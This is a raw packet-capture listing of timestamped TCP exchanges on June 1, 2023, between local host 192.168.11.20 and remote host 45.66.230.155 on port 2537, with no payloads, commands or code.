Jun 1, 2023 22:36:41.913795948 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.913798094 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914030075 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.914038897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914088964 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914100885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914165020 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914215088 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914227009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914263964 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.914287090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914340973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914361000 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914377928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914390087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914442062 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.914633989 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.914633989 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.914819956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914875984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914942980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.914994955 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915007114 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915019035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915030956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915061951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915105104 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.915122986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915134907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915146112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915163040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915174007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915287971 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.915287971 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.915467024 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.915766001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915883064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.915936947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916013956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916069984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916081905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916093111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916115999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916121006 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916134119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916152954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916173935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916193962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916207075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916301012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916301012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916301012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916301012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916491985 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916723967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916770935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916848898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916898966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916901112 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.916917086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916929007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916941881 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.916960001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917022943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917035103 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917047024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917066097 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917078018 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917092085 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.917092085 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.917273998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.917273998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.917781115 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917886972 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917948961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.917963028 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918009996 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918145895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918195009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918206930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918219090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918237925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918250084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918263912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.918456078 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.918497086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918615103 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918637037 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.918667078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918679953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918785095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918806076 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918828964 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.918833971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918853998 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918879032 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918893099 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918905020 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918917894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.918935061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919063091 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919063091 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919063091 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919063091 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919445992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919562101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919620037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919631958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919646025 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919663906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919676065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919701099 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919727087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919739962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919749022 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919749975 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919754982 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919775963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919787884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919831991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.919847012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919847965 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.919944048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920427084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920475960 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920547962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920582056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920608044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920627117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920659065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920675993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920690060 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920692921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920711040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920727015 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920742989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920743942 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920762062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920789003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.920793056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920793056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920890093 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.920959949 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.925415993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925467014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925528049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925585985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925600052 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925611973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925621033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.925741911 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.925950050 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.925950050 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.068788052 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.068788052 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.086788893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.086888075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.086945057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.086957932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.086970091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.086980104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087039948 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087244987 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087244987 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087625980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087672949 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087730885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087791920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087810993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087814093 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087845087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087863922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087882042 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087899923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087912083 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087917089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087935925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087960958 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.087961912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.087980986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088010073 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088058949 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088095903 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088129044 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088150024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088167906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088184118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088233948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088237047 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088285923 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088295937 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088332891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088354111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088362932 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088373899 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088393927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088417053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088438988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088453054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088459969 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.088525057 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088525057 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088572979 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.088921070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089030027 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089082003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089093924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089104891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089152098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089191914 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089216948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089229107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089241028 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089247942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089268923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089288950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089320898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089337111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089339018 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089339018 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089436054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089436054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.089915037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.089967966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090023041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090075970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090087891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090100050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090111971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090142012 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090173960 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090173960 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090203047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090215921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090229034 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090354919 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090354919 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090354919 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090536118 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090708017 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090759039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090828896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090883017 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.090892076 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.090898037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091000080 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091002941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091020107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091038942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091052055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091063976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091074944 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091109037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091128111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091161966 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091161966 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091260910 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091690063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091739893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091808081 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091828108 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091869116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091886044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091912031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091928005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091944933 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091957092 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091974974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.091993093 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.091995001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092012882 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092041969 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092047930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092068911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092092037 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092152119 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092200041 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092628002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092741966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092797995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092817068 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092844963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092865944 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092891932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092900038 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092909098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.092947960 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.092997074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.093019962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093033075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093045950 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.093055010 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093075037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093094110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093151093 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.093374014 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.093596935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093647957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093717098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093786955 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093796968 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.093818903 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093836069 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093849897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093869925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093883038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093894005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.093905926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094033957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.094033957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.094080925 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.094383955 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094440937 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094510078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094561100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094573975 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094585896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094624043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094676971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094687939 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.094798088 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094810963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094822884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094841957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094854116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.094870090 CEST	49850	2537	192.168.11.20	45.66.230.155
